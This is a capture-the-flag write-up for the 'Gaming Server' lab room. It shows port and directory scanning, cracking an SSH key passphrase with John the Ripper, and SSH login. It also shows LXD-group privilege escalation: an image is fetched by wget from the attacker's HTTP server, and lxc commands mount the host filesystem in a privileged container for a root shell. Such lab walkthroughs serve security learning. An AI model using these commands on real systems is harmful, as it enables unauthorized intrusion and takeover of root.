Gaming Server

Date: 11 November, 2021

Author: Dhaval Kotak

Room: Gaming Server

Port Scanning

nanomite @ zeus in ~/thm/gaming_server
⚡️ nmap 10.10.19.112 | tee nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-11 22:21 IST
Nmap scan report for 10.10.19.112
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 9.16 seconds

Gobuster Scanning

nanomite @ zeus in ~/thm/gaming_server
⚡️ gobuster dir -u http://10.10.19.112 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.19.112
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/11/11 22:22:38 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 2762]
/robots.txt           (Status: 200) [Size: 33]  
/secret               (Status: 301) [Size: 313] [--> http://10.10.19.112/secret/]
/server-status        (Status: 403) [Size: 277]                                  
/uploads              (Status: 301) [Size: 314] [--> http://10.10.19.112/uploads/]
           
===============================================================
2021/11/11 22:24:36 Finished
===============================================================

Getting SSH Credentials

Username

• We find the username john in the page source

RSA Key

• There is a RSA key in the secret directory we discovered by gobuster.

• We can use ssh2John and then JohnTheRipper itself to get the passphrase for getting the ssh login.

nanomite @ zeus in ~/thm/gaming_server
⚡️ python /opt/john/ssh2John.py id_rsa > hash
nanomite @ zeus in ~/thm/gaming_server
⚡️ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
letmein          (id_rsa)
1g 0:00:00:06 71.47% (ETA: 22:29:46) 0.1658g/s 1697Kp/s 1697Kc/s 1697KC/s alfaris
Session aborted

SSH Login

• Now we can log in as john using ssh credentials we found.

• And we get the user.txt right away

nanomite @ zeus in ~/thm/gaming_server
⚡️ ssh john@10.10.19.112 -i id_rsa                      
The authenticity of host '10.10.19.112 (10.10.19.112)' can't be established.
ECDSA key fingerprint is SHA256:LO5bYqjXqLnB39jxUzFMiOaZ1YnyFGGXUmf1edL6R9o.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.19.112' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-76-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Nov 11 17:05:39 UTC 2021

  System load:  0.0               Processes:           97
  Usage of /:   41.1% of 9.78GB   Users logged in:     0
  Memory usage: 32%               IP address for eth0: 10.10.19.112
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.


Last login: Mon Jul 27 20:17:26 2020 from 10.8.5.10
john@exploitable:~$ ls
user.txt
john@exploitable:~$ cat user.txt 
a5c2ff8b9c(REDACTED)ff2f1a5a6e7e

• What is the user flag?

  a5c2ff8b9c(REDACTED)ff2f1a5a6e7e

Privilege Escalation

Our uid is a member of lxd group which is a linux container.

john@exploitable:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip
),46(plugdev),108(lxd)

We can download alphine builder on our local machine, which provides a way to create Alpine Linux images, so we can mount it using LXD.

• First clone the repository in your machine and then run the alpine builder script as root in order to build the image as a tar file

nanomite @ zeus in ~/thm/gaming_server
⚡️ git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 42, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 42 (delta 5), reused 4 (delta 1), pack-reused 27
Receiving objects: 100% (42/42), 3.11 MiB | 650.00 KiB/s, done.
Resolving deltas: 100% (11/11), done.
nanomite @ zeus in ~/thm/gaming_server
⚡️ cd lxd-alpine-builder 
nanomite @ zeus in ~/thm/gaming_server/lxd-alpine-builder on master
⚡️ sudo ./build-alpine 

Now start a server to transfer the files from your attacker machine to the target machine

// Your Machine
nanomite @ zeus in ~/thm/gaming_server/lxd-alpine-builder on master*
⚡️ python3 -m http.server 5000                          
Serving HTTP on 0.0.0.0 port 5000 (http://0.0.0.0:5000/) ...

// Target Machine
john@exploitable:~$ wget 10.17.14.25:5000/alpine-v3.13-x86_64-20210218_0139.tar.gz/

Now import the image

lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage

Then spawn the root shell by running the following commands:

lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

After that we can find the root flag and read it.

• What is the root flag?

  2e337b8c9f(REDACTED)8d4e6a7c88fc